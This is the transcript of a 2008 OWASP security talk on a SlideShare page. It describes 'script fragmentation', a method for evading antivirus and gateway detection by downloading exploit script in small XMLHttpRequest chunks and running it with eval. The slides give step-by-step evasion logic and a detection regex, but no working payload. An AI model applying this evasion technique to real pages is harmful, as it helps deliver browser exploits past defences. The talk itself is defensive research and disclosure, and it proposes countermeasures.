• Save
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Upcoming SlideShare
Loading in...5
×
 

Script Fragmentation - Stephan Chenette - OWASP/RSA 2008

on

  • 1,911 views

ERA 2008 - Stephan Chenette, Presentation on Script Fragmentation attack...

ERA 2008 - Stephan Chenette, Presentation on Script Fragmentation attack

Abstract: This presentation will introduce a new web-based attack vector which utilizes client-side scripting to fragment malicious web content.

This involves distributing web exploits in a asynchronous manner to evade signature detection. Similar to TCP fragmentation attacks, which are still an issue in current IDS/IPS products, This attack vector involves sending any web exploit in fragments and uses the already existing components within the web browser to reassemble and execute the exploit.

Our presentation will discuss this attack vector used to evade both gateway and client side detection. We will show several proof of concepts containing common readily available web exploits.

Statistics

Views

Total Views
1,911
Views on SlideShare
1,906
Embed Views
5

Actions

Likes
0
Downloads
0
Comments
0

2 Embeds 5

http://www.linkedin.com 4
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Script Fragmentation - Stephan Chenette - OWASP/RSA 2008 Script Fragmentation - Stephan Chenette - OWASP/RSA 2008 Presentation Transcript

  • Script Fragmentation AttacksOWASP November 2008Stephan Chenette, Security ResearcherWebsense Security Labs
  • Agenda What Web Developer 101 Web 1.0 versus Web 2.0 Malicious Web 1.0 Malicious Web 2.0 + Script Fragmentation Possible Solutions 2
  • What am I talking about todayThe success of any exploit depends on some basicassumptions:The vulnerable service or application is:1) Active2) AccessibleThe exploit is:1) Reliable2) Undetected 3
  • What am I talking about todayThis presentation will focus on: Evading detection of the exploitSpecifically: A new evasion technique to avoid detection of client-side web exploitation (Browser, ActiveX control, etc bugs) 4
  • Basic Web Developer 101 HTML Browser Document Object Model (DOM) JavaScript/JSON Remote Requests - XMLHTTPRequest (XHR) Cross-Domains Requests - XDomainRequest (XDR) Available in: – Internet Explorer, Firefox – Safari, Opera and Konqeror, etc. 5
  • Basic HTML document and DOM<html> <body> <div id=“target” /> HTML </body></html><html> <body> <div id=“target” /> DOM </body></html> 6
  • JavaScript can change DOM<script>var d = document.getElementById(“target”);var n = document.createElement(“script”);n.text = “alert(„test‟);”d.appendChild(n);</script> 7
  • New DOM<html> <body> <div id=“target”> <script> alert(‘test’); DOM </script> </div> </body></html> 8
  • Basic HTML document<html> <body> </body></html> 9
  • JavaScript can execute directlyvar text = “alert(„test‟);”eval(text); 10
  • DOM stays the same<html> <body> </body></html> 11
  • The power of scriptingvar text=“ale” + “rt(“ + “„te” + “st‟” + “);”eval(text); 12
  • JSON Basicsvar text = { "firstName" : "John", "lastName" : "Doe" };var JSONObj = eval(text);// Outputs Johndocument.writeln(JSONObj.firstName);// Outputs Doedocument.writeln(JSONObj.lastName); 13
  • XHR basicsvar client = new XMLHttpRequest();client.onreadystatechange = handler;client.open("GET", "test.cgi");client.send();var client = new XMLHttpRequest();client.open("POST", "/log");client.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");client.send(message); 14
  • XDR requests (Cross-site requests)var xdr= new XDomainRequest();Xdr.onload= handler;xdr.open("GET",“http://test.com/test.cgi");xdr.send();var xdr= new XMLHTTPRequest();xdr.onload = handler;xdr.open("GET",“http://test.com/test.cgi");xdr.send(); 15
  • Web 1.0 client/server communication •GET / HTTP/1.1•Client Browser •Web Server 16
  • Web 2.0 WebsitesClient fetching content from multiple Servers+Servers receiving content from Client Benign JavaScript/HTTPXMLRequest technologies: – Gadgets – Widgets – Mashups Gmail, orkut, facebook, hi5.com, etc use JavaScript and XMLHTTPRequest. 17
  • Web 2.0 Websites•Client Browser •Web Server 18
  • Web attacks and defense Attack trends have shifted over the years. Intruders are focusing more prominently on the Web Most companies/users don‟t block HTTP at the firewall ALL Malicious client-side web attacks are assumed to be protected by desktop or gateway AV/IDS. 19
  • HTTP client/server communication •GET / HTTP/1.1•Client Browser •Web Server 20
  • Current desktop/gateway protection Looking at initial content 21
  • Current evasion techniques Obfuscated JS code 22
  • REGEX for Deobfuscation routinefor (fubatifi = 0; fubatifi < 1445; fubatifi++)fepab += String.fromCharCode(mosetib[fubatifi] ^ fedene);fors{0,5}(w{0,10}s{0,5}=s{0,5}0;s{0,5}w{0,10}s{0,5}<s{0,5}d{0,10};s{0,5}w{0,10}++)s{0,5}w{0,10}s{0,5}+=s{0,5}String.fromCharCode(w{0,10}[w{0,10}]s{0,2}^s{0,2}w{0,10}); 23
  • Successful Evasion… Passing malicious content over the network has a higher chance of evading detection the indistinguishable it is from benign traffic. A.K.A. Make malicious web 2.0 traffic look like good web 2.0 traffic. 24
  • Malicious Web 2.0/Script Fragmentation Script Active Content e.g. JavaScript, VBscript, etc. Fragmentation Little chunks of dataNote: The use of AJAX for malicious use was mentioned atToorcon 2007, but not in the detail I‟m about to go in… 25
  • Dynamic retrieval of data <script> xmlhttp.open(“GET”, “/index.php?q=2+2”, true); var response = xmlhttp.responseText; </script> •GET /index.php?q=2+2 “4”•Client Browser •Web Server 26
  • Steps for script fragmentation attack 1. Store malicious content on server 2. SERVER: Serve client webpage with script fragmentation decoder routine. 3. CLIENT: Use XMLHTTPRequest object to request only small chunk of malicious content from server 4. SERVER: respond with requested chunk of malicious content 5. CLIENT: Use JavaScript variable to save chunks of data and continue to use JavaScript and XMLHTTPRequest object to request new chunk of data until there is no more data 6. CLIENT: Execute resulting code once all data is received 27
  • Steps in action Step 1) Store malicious content on server •Web Server 28
  • Steps in action Step 1) Store malicious content on server •Web Server 29
  • Steps in action  Step 2) SERVER: Serve client webpage with script fragmentation decoder routine. •<DECODER>•Client Browser •Web Server 30
  • Script Fragmentation decoder routine 31
  • Steps in action  Step 2) CLIENT: use XMLHTTPRequest object to request only small chunk of malicious content from server •GET /index.cgi?o=0&rl=3•Client Browser •Web Server 32
  • Steps in action  Step 3) SERVER: respond with requested chunk of malicious content •“var”•Client Browser •Web Server 33
  • Steps in action  Step 4) CLIENT: store chunk and continually request more chunks until there is no more data. •GET /index.cgi?o=3&rl=3 •“ he”•Client Browser •Web Server•var text = “var he”; 34
  • Steps in action  Step 4) CLIENT: store chunk and continually request more chunks until there is no more data. •GET /index.cgi?o=6&rl=3 •“apS”•Client Browser •Web Server•var text = “var heapS”; 35
  • Steps in action  Step 4) CLIENT: store chunk and continually request more chunks until there is no more data. •GET /index.cgi?o=9&rl=3 •“pra”•Client Browser •Web Server•var text = “var heapSpra”; 36
  • Steps in action  Step 4) CLIENT: store chunk and continually request more chunks until there is no more data. •GET /index.cgi?o=12&rl=3 •“yTo ”•Client Browser •Web Server•var text = “var heapSprayTo”; 37
  • Steps in action  Step 5) CLIENT: execute resulting code once all data is received. •Client Browser•// Method 1 •// Method 2•eval(text); •var div = GetElementById(„target‟); var n = document.CreateElement(“script”); n.text = text; div.appendChild(n); 38
  • The possibilitiesBeyond the basic script fragmentation attacks: Randomize sequence of offsets xor/encrypt data Spread data across multiple web servers (botnet) (XDR) In memory keep string encrypted until the last minute 39
  • Options for data transferXMLHttpRequest is the object to make dynamic remoteHTTP request, but there are multiple data formats that maybe used for data transfer: RAW XML JSON etc.… 40
  • RAW data format •GET /index.cgi?o=0&rl=3&u=guid•Client Browser “var” •Web Server 41
  • XML data format •GET /index.cgi?o=0&rl=3•Client Browser “<Data eof=“0” text=“var” />” •Web Server 42
  • JSON data format •GET /index.cgi?o=0&rl=3 “{•Client Browser •Web Server eof : “0”,// S = server resp. text : “var”var data = eval(S); }”var text = data.text; 43
  • Flawlessly works on all major browsers Proof of concept (POC) exploited within 10-20s 44
  • AV won’t detect Script Fragmentations Initial page will hold decoder routine in script tag and then blank body. The file on disk will never change DOM in memory will never change NO SUBSTANTIAL CONTENT TO SCAN AS MALICIOUS! 45
  • HTML file on disk File on disk is the same before and after C:Documents and Settings<USER>Local SettingsTemporary Internet Files 46
  • Victory! Script Fragmentation is a very successful evasion attack that current desktop and gateway AV do not detect. 47
  • Ending remarks Reality: This attack is still a few years away We haven‟t seen this in the wild Possible Reasons: Dealing with scripting and obfuscation are still the biggest problems 48
  • Possible solutions Detecting the decoder routine Detecting network anomalies Using a “feedback loop” and executing in remote location. Dis-allow execution of content that comes from XMLHTTPRequest, hard to implement and would break functionality – so no go. Post-detection Hooking Browser internals Install security add-ons – NoScript, Flashblock, SafeHistory, Adblock Plus, LocalRodeo, CustomizeGoogle, etc. 49
  • Thank you. Any questions?Stephan Chenette, Websense Security Labsschenette@websense.com Check out our website and blogs http://securitylabs.websense.com/content/blogs.aspx http://securitylabs.websense.com/ 50